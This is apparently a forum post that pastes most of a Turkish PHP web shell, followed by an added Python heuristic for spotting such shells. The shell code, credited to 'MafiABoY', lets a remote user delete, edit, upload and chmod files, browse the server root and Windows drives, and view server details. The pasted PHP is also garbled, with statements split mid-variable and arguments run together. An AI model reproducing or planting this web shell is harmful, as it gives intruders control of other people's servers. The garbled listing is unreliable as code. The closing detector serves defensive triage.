            echo \"<center>Klasör İsmi :<input type=\'text\' name=\'kismi\'></center><br>\";
            echo \"<br>\";
            echo \"<center><INPUT TYPE=\'submit\' name=\'okmf\' value=\'TAMAM\'></center>\";
            echo \"</form>\";
    }


    if(
    $op==\'del\'){
    unlink(\"
    $fname\");
    }


    if(
    $op==\'dd\'){
            
    $dir=$here;
                    
    $deldirs=$yol;
                    if(!file_exists(\"
    $deldirs\")) {
                            echo \"<font color=\\\"#ff0000\\\">Dosya Yok</font>\";
                    } else {
                            deltree(
    $deldirs);
                    }
    }



    if(
    $op==\'edit\'){
    $yol=$fname;
    $yold=$path;
    if (isset(
    $ok)){
    $dosya = fopen(\"$yol\", \'w\') or die(\"Dosya Açılamıyor\");
    $metin=$tarea;
    fwrite(
    $dosya$metin) or die(\"Yazılamıyor!\");
    fclose(
    $dosya);
    echo \"<center><font color=\'#0000FF\'Dosya Başarıyla Düzenlendi</font></center>\";
    } else {
    $path=$dir;
    echo \"<center>DÜZENLE: 
    $yol</center>\";
    $dosya = fopen(\"$yol\", \'r\') or die(\"<center><font color=\'#FF0000\'Dosya Açılamıyor</font></center>\");
    $boyut=filesize($yol);
    $duzen = @fread ($dosya$boyut);
    echo \"<form method=post action=
    $this_file?op=edit&fname=$yol&dir=$path>\";
    echo \"<center><TEXTAREA style=\'WIDTH: 476px; HEIGHT: 383px\' name=tarea rows=19 cols=52>
    $duzen</TEXTAREA></center><br>\";
    echo \"<center><input type=\'Submit\' value=\'TAMAM\' name=\'ok\'></center>\";
    fclose(
    $dosya);
    $duzen=htmlspecialchars($duzen);
    echo \"</form>\";
    }
    }

    if($op==\'efp2\'){
    $fileperm=base_convert($_POST[\'fileperm\'],8,10);
            echo $msg=@chmod($dir.\"/\".$dismi2,$fileperm) ? \"<font color=\'#0000FF\'><b>$dismi2 İSİMLİ DOSYANIN</font></b>\" : \"<font color=\\\"#ff0000\\\">DEİŞTİRİLEMEDİ!!</font>\";
            echo \" <font color=\'#0000FF\'>CHMODU \".substr(base_convert(@fileperms($dir.\"/\".$dismi2),10,8),-4).\" OLARAK DEİŞTİRİLDİ</font>\";
    }

    if($op==\'efp\'){
    $izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
    echo \"<form method=post action=./$this_file?op=efp2>
          <div align=center><input name=\'dismi2\' type=\'text\' value=\'$dismi\' class=\'input\' readonly>CHMOD:
          <input type=\'text\' name=\'fileperm\' size=\'20\' value=\'$izinler2\' class=\'input\'>
          <input name=\'dir\' type=\'hidden\' value=\'$yol\'>
          <input type=\'submit\' value=\'TAMAM\' class=\'input\'></div><br>
          </form>\";

    }


    $path=$dir;
    if(isset($dir)){
    if ($dir = @opendir(\"$dir\")) {
    while (($file = readdir($dir)) !== false) {
    if($file!=\".\" && $file!=\"..\"){
    if(is_file(\"$path/$file\")){
    $disk_space=filesize(\"$path/$file\");
    $kb=$disk_space/1024;
    $total_kb = number_format($kb, 2, \'.\', \'\');
    $total_kb2=\"Kb\";


    echo \"<div align=right><font face=\'arial\' size=\'2\' color=\'#C0C0C0\'><b> $file</b></font> - <a href=\'./$this_file?save=$path/$file&fname=$file\'>indir</a> - <a href=\'./$this_file?op=edit&fname=$path/$file&dir=$path\'>düzenle</a> - \";
    echo \"<a href=\'./$this_file?op=del&fname=$path/$file&dir=$path\'>sil</a> - <b>$total_kb$total_kb2</b> - \";
    @$fileperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
    echo \"<a href=\'./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path\'><font color=\'#FFFF00\'>$fileperm</font></a>\";
    echo \"<br></div>\\n\";
    }else{
    echo \"<div align=left><a href=\'./$this_file?dir=$path/$file\'>GİT></a> <font face=\'arial\' size=\'3\' color=\'#808080\'> $path/$file</font> - <b>DIR</b> - <a href=\'./$this_file?op=dd&yol=$path/$file&here=$path\'>Sil</a> - \";
    $dirperm=substr(base_convert(fileperms(\"$path/$file\"),10,8),-4);
    echo \"<font color=\'#FFFF00\'>$dirperm</font>\";
    echo \" <br></div>\\n\";

    }
    }
    }
    closedir($dir);
    }
    }




    echo \"<center>------------------------------</center>\";
    echo \"<center><a href=\'./$this_file?dir=$DOCUMENT_ROOT\'>Root Klasörüne Git</a></center>\";
    echo \"<center><a href=\'./$this_file?dir=/\'>Linux Kök Dizinine Git</a></center>\";
    if(file_exists(\"B:\\\\\")){
    echo \"<center><a href=\'./$this_file?dir=B:\\\\\'>B:\\\\</a></center>\";
    } else {}
    if(file_exists(\"C:\\\\\")){
    echo \"<center><a href=\'./$this_file?dir=C:\\\\\'>C:\\\\</a></center>\";
    } else {}
    if (file_exists(\"D:\\\\\")){
     echo \"<center><a href=\'./$this_file?dir=D:\\\\\'>D:\\\\</a></center>\";
    } else {}
    if (file_exists(\"E:\\\\\")){
     echo \"<center><a href=\'./$this_file?dir=E:\\\\\'>E:\\\\</a></center>\";
    } else {}
    if (file_exists(\"F:\\\\\")){
     echo \"<center><a href=\'./$this_file?dir=F:\\\\\'>F:\\\\</a></center>\";
    } else {}
    if (file_exists(\"G:\\\\\")){
     echo \"<center><a href=\'./$this_file?dir=G:\\\\\'>G:\\\\</a></center>\";
    } else {}
    if (file_exists(\"H:\\\\\")){
     echo \"<center><a href=\'./$this_file?dir=H:\\\\\'>H:\\\\</a></center>\";
    } else {}


    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>SERVER BİLGİLERİ</b></font><br></center>\";
    echo \"<br><u><b>$SERVER_SIGNATURE</b></u>\";
    echo \"<b><u>Software</u>: $SERVER_SOFTWARE</b><br>\";
    echo \"<b><u>Server IP</u>: $SERVER_ADDR</b><br>\";
    echo \"<br>\";
    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<center><font size=\'+1\' color=\'#FF0000\'><b>İŞLEMLER</b></font><br></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=up&dir=$path\'>Dosya Gönder</a></font></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=mf&dir=$path\'>Dosya Oluştur</a></font></center>\";
    echo \"<br><center><font size=\'4\'><a href=\'$this_file?op=md&dir=$path\'>Klasör Oluştur</a></font></center>\";
    echo \"--------------------------------------------------------------------------------------------------------------------------------------------------------------------\";
    echo \"<br>
          <center>Tüm hakları sahibi MafiABoY\'a aittir</center>\";
    ?>
    Regards,
    Jon T.
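
A static check for the pattern the pasted file relies on, added here as an example and not part of the original thread: the script never assigns `$op`, `$fname`, `$yol` or `$dir` itself (they arrive from the request through register_globals) and passes them straight to `unlink()`, `fopen()`, `chmod()` and `opendir()`. The function name, the sink list, the server-variable allow-list and both sample inputs are assumptions constructed for illustration; this is a statement-level heuristic for triaging PHP files, not a PHP parser.

```python
import re

# File-system calls that the posted listing reaches with request data.
SINKS = ("unlink", "chmod", "fopen", "fwrite", "opendir", "rmdir", "mkdir")
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_FILES"}
# Assumption: these names are filled in by the web server, not the client.
SERVER_VARS = {"DOCUMENT_ROOT", "SERVER_SOFTWARE", "SERVER_ADDR", "SERVER_SIGNATURE"}
VAR = re.compile(r"\$(\w+)")
ASSIGN = re.compile(r"\$(\w+)\s*=(?!=)(.*)", re.S)   # "$x = ..." but not "$x == ..."
SINK = re.compile(r"\b(%s)\s*\(" % "|".join(SINKS))

def find_request_driven_sinks(php_source):
    """Return [(sink, [variables])] for sinks fed by request-controlled names."""
    defined, tainted, findings = set(), set(SUPERGLOBALS), []

    def is_tainted(name):
        if name in SERVER_VARS:
            return False
        if name not in defined:
            tainted.add(name)   # read before any assignment: value comes from outside the file
        return name in tainted

    for stmt in re.split(r"[;{}]", php_source):      # crude statement split
        assign = ASSIGN.search(stmt)
        rhs_tainted = assign and any([is_tainted(v) for v in VAR.findall(assign.group(2))])
        sink = SINK.search(stmt)
        if sink:
            hit = sorted({v for v in VAR.findall(stmt[sink.end():]) if is_tainted(v)})
            if hit:
                findings.append((sink.group(1), hit))
        if assign:                                   # define the left side after reading the right
            defined.add(assign.group(1))
            (tainted.add if rhs_tainted else tainted.discard)(assign.group(1))
    return findings

# Constructed sample: a few statements shaped like the listing in this thread.
SHELL_LIKE = r'''<?php
if($op=='del'){ unlink("$fname"); }
if($op=='edit'){
$yol=$fname;
$dosya = fopen("$yol", 'w');
fwrite($dosya,$tarea);
}
$fileperm=base_convert($_POST['fileperm'],8,10);
chmod($dir."/".$dismi2,$fileperm);
'''
# Constructed sample: the same sink, but on a path fixed inside the file.
BENIGN = r'<?php $log = "/var/log/app/cache.tmp"; if (file_exists($log)) { unlink($log); }'

if __name__ == "__main__":
    for sink, names in find_request_driven_sinks(SHELL_LIKE):
        print(f"{sink}() reached by {', '.join('$' + n for n in names)}")
```

Files that produce findings still need a manual read; legitimate admin tools can trip the same heuristic.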
